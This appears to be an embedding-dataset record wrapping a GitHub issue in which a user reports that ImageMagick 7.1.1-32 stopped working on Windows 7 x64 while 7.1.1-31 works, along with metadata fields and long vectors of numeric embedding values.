0.011088697239756584, 0.005326713435351849, -0.009590224362909794, -0.008555565029382706, 0.010760460048913956, 0.0004544474941212684, -0.0012638902990147471, -0.019180448725819588, -0.017025502398610115, -0.013486253097653389, -0.006561169400811195, 0.023304816335439682, 0.013579015620052814, 0.004541798960417509, -0.022448547184467316, -0.0031432246323674917, 0.0046631041914224625, -0.004477578680962324, -0.002563458401709795, -0.007299702148884535, 0.0035499529913067818, 0.01705404557287693, -0.0060367039404809475, 0.029626943171024323, -0.015826724469661713, -0.006807346828281879, 0.014535184018313885, -0.021235497668385506, -0.0053909337148070335, -0.004145774058997631, -0.016968417912721634, 0.0039923591539263725, 0.01661163941025734, -0.002625894732773304, -0.022919494658708572, 0.005704899318516254, 0.022220207378268242, -0.012494407594203949, 0.00005237407094682567, 0.0004901253851130605, 0.008733954280614853, -0.004752298817038536, -0.0052660610526800156, -0.012515814043581486, 0.028542334213852882, 0.002914885990321636, 0.013236507773399353, -0.016069334000349045, 0.00020035381021443754, 0.015612657181918621, -0.003635579952970147, 0.007913362234830856, -0.013015304692089558, -0.017482180148363113, 0.01504181046038866, 0.02503162808716297, 0.013115203008055687, 0.02190624177455902, -0.01309379655867815, 0.0048486292362213135, 0.017681976780295372, -0.0006475542322732508, -0.018937839195132256, 0.04249953851103783, -0.004830790217965841, 0.003152144141495228, -0.005597865674644709, 0.009854241274297237, -0.0032698812428861856, -0.008648327551782131, 0.003426864044740796, -0.018038755282759666, -0.0018802263075485826, 0.0036480671260505915, 0.008006124757230282, 0.007057092152535915, 0.003742613596841693, -0.009511733427643776, 0.02919880859553814, 0.0037497493904083967, -0.02804284356534481, 0.020293600857257843, -0.006457703188061714, -0.004830790217965841, -0.007656481582671404, 0.01723957061767578, 0.007834871299564838, 0.003234203439205885, -0.010111122392117977, -0.00697860075160861, 0.00749236298725009, 0.012858321890234947, 0.00011132625513710082, -0.0010694456286728382, 0.0026865473482757807, -0.015869539231061935, 0.01063915528357029, 0.009861377067863941, 0.016825705766677856, 0.005869017448276281, 0.01872377097606659, 0.0002876532089430839, 0.021092785522341728, 0.0110244769603014, -0.0075351763516664505, 0.010417952202260494, 0.04706631228327751, -0.002172785345464945, -0.015155980363488197, -0.015370047651231289, 0.010517850518226624, 0.005893992260098457, -0.005066264420747757, -0.024489322677254677, 0.0010016575688496232, 0.0013628965243697166, -0.005633543245494366, 0.030369045212864876, 0.02752908132970333, 0.002372581511735916, 0.023176375776529312, 0.013778812251985073, -0.00004847179661737755, -0.023461800068616867, -0.012216119095683098, 0.027871590107679367 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-32 x86 & x64 ### Operating system, version and so on Windows 7 x64 ### Description Aggrrhh! [7.1.1-31][1] works fine. [1]: https://web.archive.org/web/20240423175708/https://imagemagick.org/script/download.php ### Steps to Reproduce Run. ### Images ![2024-0507-2202 magick 7 error](https://github.com/ImageMagick/ImageMagick/assets/373718/3cc3c8ae-3fe2-41cc-90f0-62a32c88aac8)
ImageMagick stopped working on Windows 7
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7296/comments
8
2024-05-07T19:10:36
2024-05-09T06:05:27Z
https://github.com/ImageMagick/ImageMagick/issues/7296
2,284,039,086
7,296
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : ImageMagick stopped working on Windows 7 Issue date: --- start body --- ### ImageMagick version 7.1.1-32 x86 & x64 ### Operating system, version and so on Windows 7 x64 ### Description Aggrrhh! [7.1.1-31][1] works fine. [1]: https://web.archive.org/web/20240423175708/https://imagemagick.org/script/download.php ### Steps to Reproduce Run. ### Images ![2024-0507-2202 magick 7 error](https://github.com/ImageMagick/ImageMagick/assets/373718/3cc3c8ae-3fe2-41cc-90f0-62a32c88aac8) --- end body ---
595
[ -0.009435462765395641, -0.0028620476368814707, 0.00837140902876854, 0.036947015672922134, 0.016242841258645058, 0.043049298226833344, -0.01435831282287836, 0.050356652587652206, 0.0005079894326627254, 0.03335743770003319, 0.02535780519247055, -0.01205072645097971, 0.013653216883540154, 0.001274780952371657, -0.02687055617570877, -0.012569934129714966, -0.04369029402732849, 0.005858704447746277, -0.01908886432647705, -0.017717132344841957, 0.012864791788160801, -0.0019342057639732957, -0.012396864593029022, 0.03979303687810898, -0.03128061071038246, -0.00887138582766056, -0.0007535710465162992, -0.0029950542375445366, 0.00004972727765562013, -0.02030675671994686, 0.0228707417845726, 0.009813650511205196, 0.010025179013609886, 0.031716488301754, 0.06174074485898018, -0.005470901727676392, 0.020422136411070824, 0.042664699256420135, -0.002140926895663142, 0.03199852630496025, -0.039254602044820786, -0.013473737984895706, 0.010262347757816315, 0.030306296423077583, -0.020075997337698936, -0.011935347691178322, -0.011948167346417904, -0.015704404562711716, -0.03279336169362068, 0.037075214087963104, 0.013063500635325909, -0.04940798133611679, 0.00008548283949494362, -0.03804953023791313, 0.002382903126999736, -0.025421906262636185, 0.012800692580640316, 0.014960848726332188, -0.0413057878613472, 0.022216925397515297, -0.02633211947977543, 0.010743094608187675, -0.004733756184577942, 0.029075583443045616, -0.052459120750427246, 0.01703767664730549, -0.014730090275406837, 0.009031634777784348, -0.018909385427832603, -0.009973899461328983, -0.022729722782969475, -0.013589117676019669, 0.03528042510151863, 0.017127415165305138, 0.0004727346240542829, -0.04294674098491669, 0.05192068591713905, -0.018717085942626, -0.06015107408165932, 0.013742956332862377, -0.06322785466909409, -0.014396772719919682, -0.0649200826883316, 0.03745981305837631, 0.013948075473308563, 0.002926147310063243, -0.03745981305837631, -0.07122749090194702, -0.052459120750427246, 0.012730183079838753, 0.0068586585111916065, 0.030126817524433136, 0.014794190414249897, 0.021922066807746887, -0.00013881572522222996, -0.019024765118956566, -0.007909892126917839, -0.001432626275345683, -0.040946830064058304, -0.008499608375132084, 0.03279336169362068, -0.07517602294683456, -0.002267523668706417, -0.03433175012469292, 0.025409085676074028, 0.01740945503115654, -0.024960389360785484, -0.004733756184577942, 0.018537607043981552, 0.0807655081152916, -0.006236892193555832, -0.00668558944016695, 0.022857921198010445, -0.021422090008854866, 0.0018572862027212977, 0.03284464031457901, 0.014409592375159264, -0.023742495104670525, -0.012351995334029198, 0.029203781858086586, -0.031024212017655373, -0.027614112943410873, -0.005820244550704956, 0.005746529903262854, -0.0516386479139328, 0.03187032788991928, -0.0004955701297149062, -0.016512060537934303, -0.0053555225022137165, -0.010249528102576733, -0.005874729249626398, 0.01879400573670864, 0.035895783454179764, -0.0025784068275243044, -0.010993083007633686, -0.0516386479139328, -0.03645985946059227, 0.047202952206134796, -0.00895471591502428, 0.010211068205535412, -0.06358681619167328, -0.030383216217160225, 0.0172427948564291, 0.012326355092227459, -0.032613880932331085, 0.005070279352366924, -0.048177268356084824, -0.051587365567684174, -0.0057913996279239655, 0.009621351957321167, -0.0343061126768589, -0.015050588175654411, -0.011505880393087864, 0.0024566175416111946, 0.038536686450242996, -0.010473876260221004, 0.022434864193201065, 0.011140512302517891, -0.004474152810871601, -0.04630555957555771, -0.014153193682432175, -0.002552767051383853, 0.013268619775772095, 0.00967263150960207, 0.002091249916702509, -0.008820106275379658, 0.004413258284330368, 0.006563799921423197, -0.020319577306509018, 0.011384091340005398, -0.009595711715519428, 0.014691630378365517, -0.024114273488521576, -0.024460410699248314, -0.023691216483712196, 0.03310104086995125, -0.00619202246889472, 0.03335743770003319, -0.005131173878908157, -0.030255015939474106, -0.028485866263508797, 0.0027803205884993076, -0.0037017525173723698, -0.02679363638162613, 0.07071468979120255, -0.026306480169296265, -0.0009727115975692868, -0.023704035207629204, 0.008076551370322704, -0.003387664444744587, -0.010736685246229172, -0.011384091340005398, 0.023114319890737534, -0.041357070207595825, 0.019152963533997536, 0.033536914736032486, -0.0656379982829094, -0.0354086235165596, -0.003124855924397707, -0.04184422641992569, 0.006627899594604969, -0.027819231152534485, -0.015999263152480125, -0.04369029402732849, 0.0029710170347243547, -0.005608716048300266, -0.011031542904675007, 0.01665307953953743, 0.016422320157289505, -0.012717362493276596, 0.00765349343419075, -0.009082915261387825, -0.0010239912662655115, -0.007724002934992313, -0.025383446365594864, -0.0015512105310335755, -0.03128061071038246, 0.03666497766971588, -0.027767950668931007, 0.013742956332862377, 0.02413991279900074, -0.014371132478117943, 0.012095596641302109, -0.01065976545214653, -0.04525432363152504, -0.030460134148597717, 0.0021152871195226908, -0.023768136277794838, -0.031178051605820656, 0.01914014294743538, -0.03802388906478882, -0.03074217401444912, -0.0138326957821846, 0.027357714250683784, -0.027870511636137962, -0.009204704314470291, 0.0002772308071143925, 0.016576159745454788, -0.012730183079838753, 0.01015337835997343, 0.04274161905050278, 0.05189504474401474, -0.002382903126999736, 0.0015712417662143707, 0.02539626508951187, 0.009973899461328983, -0.004275443963706493, -0.02725515514612198, -0.006012543570250273, 0.004563892260193825, 0.0065477751195430756, 0.017678672447800636, -0.002679363824427128, -0.013422458432614803, 0.02889610454440117, -0.0033940745051950216, 0.018717085942626, 0.0025735993403941393, 0.01379423588514328, -0.008890615776181221, 0.014178833924233913, 0.04163910821080208, -0.018896564841270447, 0.019819600507616997, 0.04763882979750633, -0.006089462898671627, -0.027408992871642113, 0.051997605711221695, -0.005429237149655819, -0.0018797210650518537, 0.004400438163429499, -0.00643560104072094, -0.015665944665670395, -0.05051049217581749, -0.020345216616988182, -0.02170412801206112, 0.01644795946776867, 0.013345538638532162, 0.029075583443045616, -0.018691446632146835, -0.015512106008827686, 0.023486098274588585, -0.015319806523621082, 0.008307309821248055, 0.013435278087854385, 0.01314042042940855, 0.004663246683776379, -0.021140052005648613, -0.05353599414229393, 0.026896197348833084, -0.008332949131727219, 0.023024579510092735, -0.026434678584337234, 0.003107228549197316, 0.008461148478090763, -0.019396541640162468, 0.015165967866778374, 0.0005135981482453644, -0.01567876525223255, -0.0009614941664040089, -0.0013508993433788419, -0.0074035050347447395, 0.010787964798510075, 0.0041216048412024975, -0.04374157264828682, -0.012518653646111488, 0.010223887860774994, 0.008730366826057434, -0.003573553403839469, -0.022050265222787857, 0.00837140902876854, -0.006775328889489174, 0.011781508103013039, 0.024088634178042412, -0.03476762771606445, 0.0015784528804942966, 0.02426811307668686, -0.031024212017655373, 0.0064388057217001915, -0.03792132809758186, -0.01661461964249611, -0.006954807788133621, -0.029460180550813675, 0.008435509167611599, 0.014948029071092606, -0.009935439564287663, -0.024665530771017075, 0.04756191000342369, -0.02030675671994686, -0.009813650511205196, 0.011871247552335262, -0.022563062608242035, -0.01231994479894638, -0.0017451118910685182, 0.02666543796658516, -0.0547667071223259, -0.013089140877127647, 0.009493152610957623, 0.02456297166645527, 0.036947015672922134, -0.02030675671994686, 0.004579917062073946, -0.0335625559091568, -0.035382986068725586, 0.019063225015997887, -0.025665484368801117, 0.017806872725486755, -0.0067496891133487225, 0.03007553704082966, -0.002547959564253688, 0.0007038938347250223, 0.035639382898807526, -0.0296909399330616, 0.015832602977752686, -0.008211160078644753, -0.025127047672867775, 0.012044317089021206, -0.002690581139177084, 0.019588841125369072, -0.006015748251229525, -0.006147152744233608, -0.04269034042954445, -0.018999123945832253, -0.016255661845207214, -0.0029742219485342503, -0.006483675446361303, 0.003999815788120031, -0.030126817524433136, -0.006179202347993851, -0.006583029869943857, -0.03625474125146866, 0.02153746969997883, -0.05451031029224396, 0.04289545863866806, -0.010858474299311638, -0.02653723955154419, 0.03112677112221718, -0.012537883594632149, -0.0352291464805603, 0.002562382025644183, -0.02249896340072155, 0.004586327355355024, 0.016588978469371796, -0.01661461964249611, 0.022396404296159744, -0.0011449792655184865, -0.018268389627337456, -0.011845608241856098, 0.00994184985756874, -0.05707429349422455, -0.04176730662584305, -0.010666174814105034, -0.024421950802206993, -0.02897302433848381, -0.0030847936868667603, 0.032357484102249146, 0.009634171612560749, 0.011730228550732136, 0.010268758051097393, 0.012954531237483025, -0.0024341826792806387, -0.021755408495664597, 0.04612607881426811, -0.014640350826084614, -0.016345400363206863, 0.034459952265024185, -0.005291422829031944, 0.009621351957321167, 0.0022547037806361914, 0.025178326293826103, -0.005643970798701048, 0.017640212550759315, -0.02863970585167408, 0.03304975852370262, -0.01356347743421793, 0.031306248158216476, -0.017640212550759315, -0.04238266125321388, -0.018704267218708992, -0.014794190414249897, -0.005608716048300266, -0.004108785185962915, -0.02804999053478241, -0.005051049403846264, 0.00957007147371769, -0.02351173758506775, -0.02257588319480419, -0.014576251618564129, 0.02451169118285179, -0.00957007147371769, 0.002898904960602522, -0.024152733385562897, 0.02565266378223896, 0.01333271898329258, 0.03415227308869362, -0.01690947823226452, -0.01955038122832775, -0.004938874859362841, 0.010608485899865627, 0.01192252803593874, 0.0009078107541427016, 0.06517648696899414, 0.02771667204797268, -0.005634355824440718, -0.02804999053478241, 0.005467696581035852, -0.06056131049990654, 0.024127094075083733, -0.002102467231452465, -0.005986903794109821, 0.015922343358397484, 0.024165553972125053, 0.0248065497726202, -0.03007553704082966, -0.005374752450734377, 0.01478136982768774, -0.018114550039172173, -0.008595758117735386, 0.011672538705170155, -0.021255431696772575, 0.022909201681613922, -0.0015456018736585975, -0.028690986335277557, -0.003762647043913603, -0.01162766944617033, 0.034049712121486664, -0.002584816887974739, -0.008653447031974792, 0.00522411847487092, -0.007730413228273392, 0.0032354278955608606, 0.01914014294743538, 0.0034325341694056988, 0.027562832459807396, -0.009820060804486275, 0.011505880393087864, -0.02076827362179756, 0.019563201814889908, 0.027152596041560173, -0.02224256470799446, -0.015999263152480125, -0.022152826189994812, -0.023524556308984756, 0.015089048072695732, 0.05230528116226196, -0.013640397228300571, 0.021922066807746887, -0.023998893797397614, -0.04938234016299248, 0.05043357238173485, -0.01681973785161972, 0.04797215014696121, -0.008711136877536774, -0.01389679592102766, 0.012960941530764103, 0.01749919354915619, -0.018858104944229126, -0.006775328889489174, 0.030665254220366478, 0.018063269555568695, 0.01131358090788126, 0.010070049203932285, 0.012012267485260963, 0.0038331567775458097, 0.032947201281785965, -0.06645847856998444, 0.004573507234454155, 0.024960389360785484, -0.010320037603378296, -0.03461378812789917, 0.016537699848413467, -0.028537146747112274, -9.671279030953883e-7, -0.041818585246801376, 0.007993221282958984, -0.015589025802910328, 0.022614343091845512, -0.03345999866724014, 0.04951053857803345, 0.02060161530971527, -0.01867862604558468, -0.05125404894351959, 0.0008184718899428844, 0.018870925530791283, 0.017345353960990906, -0.012621213681995869, 0.015486465767025948, 0.011159742251038551, -0.0007211206248030066, 0.008493198081851006, 0.005323472898453474, -0.0045478674583137035, 0.016127461567521095, 0.06394577026367188, -0.015024948865175247, 0.01362757757306099, -0.0326395221054554, -0.012268665246665478, -0.009204704314470291, -0.01808891072869301, -0.014960848726332188, 0.02043495513498783, -0.0206528939306736, -0.0050863041542470455, -0.011614849790930748, 0.0007050957065075636, -0.015383906662464142, 0.019999079406261444, -0.01478136982768774, -0.009730321355164051, -0.004208139609545469, -0.007467604707926512, 0.004015840590000153, -0.00021373214258346707, 0.010416186414659023, 0.02817818894982338, 0.027434634044766426, 0.006105487700551748, 0.04735679179430008, 0.029049944132566452, -0.01943500153720379, 0.0324600413441658, -0.005528591573238373, 0.0352291464805603, 0.00357996323145926, -0.02410145290195942, 0.04743371158838272, -0.009557251818478107, -0.057843487709760666, -0.02902430295944214, 0.01640949957072735, -0.004858750384300947, -0.03238312155008316, -0.012967350892722607, -0.011153331957757473, 0.004259419161826372, 0.018704267218708992, -0.021806687116622925, -0.0060510034672915936, 0.011018723249435425, 0.040895551443099976, -0.004317109007388353, 0.008435509167611599, -0.005317062605172396, -0.005400392226874828, -0.014768550172448158, 0.017217155545949936, 0.006583029869943857, -0.02472962997853756, -0.020319577306509018, -0.018011990934610367, -0.008486788719892502, 0.019165784120559692, 0.019781140610575676, 0.015358266420662403, -0.0276653915643692, 0.0056728157214820385, 0.008647037670016289, 0.01656333915889263, -0.015332627110183239, -0.011813558638095856, -0.011108462698757648, 0.006204842124134302, -0.029383260756731033, -0.021293891593813896, -0.010826424695551395, 0.026460319757461548, 0.0006738471565768123, 0.012582753784954548, -0.006711229216307402, 0.004743371158838272, 0.044049251824617386, 0.021255431696772575, -0.012710953131318092, 0.020716995000839233, -0.015435186214745045, -0.0002395722985966131, -0.005865114275366068, -0.019704220816493034, -0.009005995467305183, 0.036947015672922134, -0.02030675671994686, 0.015332627110183239, 0.021729767322540283, -0.02430657297372818, 0.018601706251502037, -0.022229744121432304, -0.024575790390372276, 0.00837140902876854, -0.04066479206085205, -0.016076182946562767, 0.003688932629302144, -0.006563799921423197, -0.002437387593090534, -0.026691077277064323, 0.01849914714694023, 0.027691032737493515, -0.007448374759405851, -0.010191838257014751, -0.0013989739818498492, -0.02220410481095314, -0.01988369971513748, 0.0033620246686041355, 0.037664931267499924, -0.006342656444758177, -0.007377865258604288, 0.009300853125751019, 0.0335625559091568, -0.004285058937966824, 0.004583122208714485, -0.04097247123718262, -0.000007805880159139633, -0.004685681778937578, 0.011230251751840115, -0.007006087340414524, 0.005810629576444626, 0.019114503636956215, 0.05210016295313835, -0.011980216950178146, 0.005557436030358076, -0.019524741917848587, -0.00715992646291852, -0.010416186414659023, -0.008973945863544941, 0.026101361960172653, 0.020050358027219772, -0.032536961138248444, -0.017473554238677025, 0.030690893530845642, 0.02863970585167408, 0.017229976132512093, -0.010922573506832123, -0.008486788719892502, 0.01085206400603056, -0.013319899328052998, -0.017345353960990906, 0.009698270820081234, -0.002672953763976693, 0.009300853125751019, 0.022973300889134407, 0.0010119725484400988, -0.0009182268986478448, 0.0026008416898548603, 0.018396588042378426, -0.025498826056718826, 0.006736868992447853, 0.0006634309538640082, 0.0026553263887763023, 0.00910214427858591, -0.06763791292905807, 0.015024948865175247, 0.010255937464535236, -0.02334507741034031, -0.0056728157214820385, -0.020409315824508667, 0.010140558704733849, -0.017229976132512093, -0.01698639616370201, -0.017653033137321472, -0.015909522771835327, -0.024614250287413597, 0.0010776746785268188, -0.009890570305287838, 0.009954669512808323, -0.015358266420662403, 0.0060029285959899426, -0.004647221881896257, -0.007724002934992313, 0.004006225615739822, 0.007198386359959841, -0.002437387593090534, 0.0050254096277058125, 0.008082960732281208, 0.0027290410362184048, -0.01690947823226452, -0.006317016668617725, -0.019396541640162468, -0.03271644189953804, 0.014960848726332188, -0.007153516635298729, -0.000565679045394063, 0.015409545972943306, -0.024588610976934433, -0.046279918402433395, 0.00967263150960207, 0.018140189349651337, 0.035254787653684616, 0.02076827362179756, 0.015819784253835678, 0.010435416363179684, 0.012409684248268604, -0.028742264956235886, 0.014973669312894344, -0.01711459644138813, -0.013755776919424534, 0.0008901833207346499, 0.010320037603378296, -0.005291422829031944, 0.04151090979576111, -0.002265921328216791, 0.0016121051739901304, 0.016076182946562767, -0.0064388057217001915, -0.03838284686207771, 0.0023748904932290316, -0.03499838709831238, -0.016306940466165543, 0.012390455231070518, -0.020870832726359367, -0.013653216883540154, 0.01672999933362007, 0.016640258952975273, 0.00958930142223835, -0.027767950668931007, 0.024280931800603867, -0.0005039831739850342, 0.012781462632119656, -0.0228707417845726, 0.0001224903535330668, -0.03133188933134079, 0.011730228550732136, -0.05953571945428848, 0.0067496891133487225, 0.0014534586807712913, 0.008525248616933823, 0.0021088772919028997, 0.009448282420635223, 0.010948213748633862, 0.0039004613645374775, -0.004615171812474728, 0.006220867391675711, 0.00541641702875495, -0.03887000307440758, -0.00668558944016695, 0.005512566305696964, -0.03284464031457901, -0.05281807854771614, -0.03920332342386246, 0.0016281300922855735, 0.03148572891950607, -0.02469117008149624, 0.013473737984895706, -0.05789477005600929, 0.05517694354057312, 0.008070141077041626, -0.01593516394495964, -0.008211160078644753, -0.019204244017601013, 0.011685359291732311, 0.0017178695416077971, -0.026562878862023354, -0.041280150413513184, 0.05497182533144951, -0.0056792255491018295, -0.01511468831449747, -0.009076504968106747, 0.009563662111759186, 0.005579871125519276, 0.016717178747057915, -0.021768227219581604, -0.006884298287332058, -0.01461471151560545, -0.014396772719919682, -0.01428139302879572, -0.03166520595550537, -0.025793682783842087, -0.04048531502485275, 0.020678535103797913, -0.0449979268014431, 0.03976739943027496, 0.013486558571457863, -0.006246507167816162, -0.003519068704918027, 0.003470993833616376, -0.0017210745718330145, 0.0035927831195294857, -0.01461471151560545, -0.0012876009568572044, -0.005285013001412153, 0.0050254096277058125, -0.03712649643421173, -0.002322008367627859, 0.006214457098394632, -0.00046311967889778316, -0.046408116817474365, 0.02216564491391182, -0.016678718850016594, 0.010961033403873444, -0.011960987001657486, 0.0076663135550916195, -0.03469070792198181, -0.022088725119829178, -0.022614343091845512, -0.002762693213298917, -0.0025559719651937485, 0.026383399963378906, 0.0042722392827272415, 0.0037241873797029257, -0.041741665452718735, 0.0451774038374424, -0.015242887660861015, 0.025421906262636185, -0.0006978845340199769, -0.02211436629295349, -0.006743279285728931, -0.01408909447491169, -0.007704772986471653, 0.02363993600010872, 0.01942218281328678, -0.0021922066807746887, 0.016576159745454788, 0.004381208214908838, -0.0075637539848685265, 0.01875554583966732, 0.014012174680829048, 0.0018572862027212977, 0.0019229883328080177, 0.007756053004413843, 0.008057321421802044, -0.0157685037702322, -0.004640812054276466, 0.013935255818068981, 0.007595804054290056, -0.01640949957072735, 0.04907466098666191, 0.002338033402338624, 0.013973714783787727, 0.02948582172393799, -0.0023027784191071987, 0.008980355225503445, -0.011191791854798794, -0.030767813324928284, 0.03894692286849022, -0.015524925664067268, -0.021011851727962494, 0.0301524568349123, -0.027357714250683784, -0.006602259818464518, -0.004611967131495476, -0.009435462765395641, -0.006204842124134302, -0.0056183310225605965, -0.013614756986498833, 0.008448328822851181, -0.003506248816847801, -0.026011621579527855, 0.014627531170845032, -0.026767997071146965, 0.0036504727322608232, 0.029665300622582436, 0.009082915261387825, -0.028332028537988663, -0.006736868992447853, -0.030690893530845642, 0.016537699848413467, -0.011928937397897243, 0.002871662611141801, -0.014409592375159264, -0.0001443242799723521, -0.029203781858086586, -0.0019358082208782434, 0.0015776517102494836, 0.024832189083099365, 0.010967443697154522, 0.010294397361576557, -0.010025179013609886, -0.0030335141345858574, -0.00960853137075901, 0.023986075073480606, 0.006288171745836735, 0.01901194453239441, -0.014819829724729061, 0.004124809987843037, -0.022396404296159744, -0.008775237016379833, 0.011967397294938564, -0.024845009669661522, -0.006073438096791506, 0.008082960732281208, 0.02430657297372818, -0.026011621579527855, 0.017460733652114868, -0.011178972199559212, 0.011852017603814602, -0.005166428629308939, -0.007377865258604288, -0.03287028148770332, 0.004496587906032801, 0.01792225055396557, 0.006627899594604969, 0.022024625912308693, -0.019396541640162468, -0.03120369091629982, 0.0013541042571887374, 0.004740166012197733, -0.03494710847735405, 0.01412755437195301, 0.02817818894982338, -0.022024625912308693, -0.04035711660981178, 0.012794282287359238, -0.01059566531330347, -0.0008917858358472586, -0.004512612707912922, 0.0048715705052018166, 0.02598598226904869, -0.0057817851193249226, -0.009031634777784348, -0.027485912665724754, -0.03266516327857971, -0.02329379878938198, -0.01564030535519123, 0.01556338556110859, -0.024883469566702843, -0.021178511902689934, 0.018358128145337105, -0.007954761385917664, 0.001268371008336544, -0.003996610641479492, -0.021140052005648613, -0.005788194946944714, -0.0013701291754841805, -0.02106313221156597, -0.003967765718698502, -0.019832419231534004, 0.021075952798128128, -0.016588978469371796, -0.014012174680829048, -0.007794512901455164, -0.01628130115568638, -0.006736868992447853, 0.009557251818478107, 0.0025111022405326366, -0.015332627110183239, -0.037998247891664505, 0.02513986825942993, 0.009134194813668728, -0.004397233482450247, -0.013448098674416542, -0.006634309887886047, -0.01715305633842945, -0.026639798656105995, 0.051587365567684174, 0.020640075206756592, 0.010787964798510075, -0.019319621846079826, 0.05227964371442795, 0.0310754906386137, -0.0004004222573712468, 0.0036056030075997114, 0.019499100744724274, 0.012563523836433887, 0.0017322920029982924, -0.03443431109189987, 0.0007022913778200746, 0.02111441269516945, -0.0009719103691168129, -0.00571768544614315, 0.011800738051533699, 0.006015748251229525, -0.03971611708402634, 0.022909201681613922, -0.024575790390372276, -0.014255753718316555, 0.01455061137676239, 0.020550334826111794, 0.003874821588397026, 0.009659810923039913, 0.0055702561512589455, 0.004102374892681837, -0.0021232995204627514, 0.012473784387111664, 0.04235702380537987, -0.030255015939474106, -0.0035607332829385996, 0.03810080885887146, 0.007083007134497166, -0.017858151346445084, -0.014114734716713428, 0.042203184217214584, -0.0053010378032922745, -0.020806733518838882, 0.0012876009568572044, -0.022845100611448288, 0.002900507301092148, 0.0011009108275175095, -0.000694278918672353, -0.0017755592707544565, 0.026165461167693138, 0.006852248217910528, 0.003046334022656083, 0.00798681192100048, 0.016717178747057915, 0.007102237083017826, -0.03571630269289017, -0.015473646111786366, -0.014999308623373508, -0.004317109007388353, -0.010287987068295479, 0.007595804054290056, 0.05415135249495506, -0.01896066404879093, 0.009486742317676544, 0.005621535703539848, 0.001274780952371657, 0.0301524568349123, 0.0031585083343088627, -0.013178880326449871, -0.012037906795740128, -0.050356652587652206, 0.012762232683598995, 0.012428914196789265, 0.015396726317703724, -0.044433850795030594, -0.016371039673686028, -0.005778579972684383, 0.017819691449403763, -0.03166520595550537, 0.0014302225317806005, -0.008326539769768715, -0.02367839589715004, -0.025588564574718475, -0.016127461567521095, -0.006877888459712267, -0.010922573506832123, 0.01589670404791832, 0.002305983565747738, 0.017755592241883278, 0.008185519836843014, 0.008698317222297192, 0.003986995667219162, 0.02233230508863926, 0.003929306287318468, -0.017524832859635353, 0.016345400363206863, 0.006704819388687611, 0.0003942126058973372, 0.0005965270102024078, 0.00038019081694073975, -0.011743049137294292, 0.00321780052036047, -0.029280701652169228, 0.007961171679198742, 0.021345170214772224, -0.01925552263855934, 0.016883837059140205, -0.0044869729317724705, -0.014524972066283226, -0.031819045543670654, -0.0005304242949932814, -0.011275121942162514, 0.0013941664947196841, 0.0024405927397310734, -0.024652710184454918, -0.008191930130124092, -0.006852248217910528, 0.0124032748863101, 0.07661185413599014, 0.01255711354315281, -0.038203369826078415, -0.007621443830430508, -0.025729583576321602, -0.02069135382771492, -0.016640258952975273, -0.025755222886800766, -0.019999079406261444, 0.00819834042340517, 0.005121558904647827, -0.009243164211511612, -0.01057643536478281, 0.035690661519765854, 0.016794098541140556, -0.007108646910637617, 0.016871018335223198, -0.004166474565863609, -0.005881139077246189, -0.006095873191952705, -0.026691077277064323, 0.01849914714694023, -0.00491964491084218, -0.013127599842846394, 0.023152779787778854, -0.009416232816874981, -0.018729906529188156, 0.013742956332862377, -0.012736592441797256, -0.008339359425008297, -0.0172427948564291, 0.014140374027192593, 0.021140052005648613, -0.005067074205726385, -0.0058394744992256165, -0.008903436362743378, 0.01846068724989891, 0.002586419228464365, 0.0020175352692604065, -0.013986535370349884, 0.020793912932276726, 0.010762324556708336, 0.009743141010403633, -0.011114872060716152, 0.0055221812799572945, -0.015909522771835327, 0.03192160651087761, -0.009743141010403633, -0.00666635949164629, 0.009121374227106571, 0.006993267685174942, -0.026588518172502518, 0.005240143276751041, 0.0035831681452691555, -0.018242748454213142, -0.016576159745454788, 0.01036490686237812, 0.02308868058025837, -0.001806006534025073, 0.0015311794122681022, 0.0013573092874139547, -0.005515771452337503, -0.034972745925188065, -0.007115056738257408, 0.02181950770318508, 0.026383399963378906, -0.0025832143146544695, -0.0018588886596262455, -0.002019137842580676, 0.015178787522017956, 0.013845516368746758, 0.012473784387111664, 0.0011650103842839599, 0.010031589306890965, 0.026639798656105995, 0.013525017537176609, -0.01934526301920414, 0.031229330226778984, -0.028460226953029633, -0.017101775854825974, 0.01560184545814991, 0.009595711715519428, -0.005813834723085165, 0.018832465633749962, -0.007788102608174086, 0.02207590639591217, -0.0035382984206080437, -0.040639154613018036, 0.0008653447730466723, -0.0008941895794123411, -0.025973161682486534, 0.006297786720097065, 0.032742079347372055, 0.006659949664026499, 0.0011794328456744552, 0.0023460458032786846, 0.002453412627801299, -0.005874729249626398, -0.017460733652114868, -0.021960526704788208, 0.015101868659257889, -0.005211298353970051, 0.010531566105782986, -0.006134332623332739, -0.028408948332071304, 0.02884482406079769, -0.004060710314661264, 0.022845100611448288, -0.004948489833623171, -0.005849089473485947, -0.020447775721549988, -0.01790943183004856, -0.015665944665670395, -0.018319668248295784, -0.017691493034362793, 0.011563570238649845, 0.02804999053478241, 0.01307632029056549, 0.0010191837791353464, -0.00821757037192583, -0.012185336090624332, -0.01934526301920414, 0.018858104944229126, 0.008473968133330345, 0.0039485362358391285, 0.0071342866867780685, 0.0005684834322892129, 0.01219174638390541, 0.02889610454440117, -0.011281531304121017, -0.0012122838525101542, 0.0053491126745939255, 0.007435554638504982, -0.02902430295944214, 0.004265828989446163, 0.0074099148623645306, -0.012653263285756111, 0.001268371008336544, -0.01428139302879572, 0.031434450298547745, -0.021588748320937157, -0.002559176879003644, 0.015665944665670395, 0.028152549639344215, 0.009525202214717865, 0.005579871125519276, 0.0009911402594298124, -0.021101592108607292, 0.0033075399696826935, 0.028280748054385185, 0.013730136677622795, -0.03802388906478882, -0.01698639616370201, 0.00321780052036047, -0.004884390160441399, -0.01640949957072735, 0.03174212574958801, -0.01849914714694023, 0.007980401627719402, 0.011807148344814777, -0.005060664378106594, 0.02308868058025837, 0.006185612641274929, -0.009230343624949455, 0.01503776852041483, 0.015127507969737053, 0.028614066541194916, 0.002230666344985366, -0.02329379878938198, -0.022614343091845512, 0.029049944132566452, 0.03584450110793114, -0.00595164904370904, -0.007416325155645609, 0.023652756586670876, 0.026088541373610497, -0.03784441202878952, 0.011582799255847931, 0.003916486166417599, -0.006890708114951849, 0.009999539703130722, 0.034459952265024185, -0.02233230508863926, 0.002262716181576252, -0.012569934129714966, -0.03812645003199577, -0.009698270820081234, 0.004717731382697821, -0.011832788586616516, 0.00345817394554615, -0.0024566175416111946, 0.029255062341690063, -0.010191838257014751, -0.03161392733454704, 0.024524511769413948, 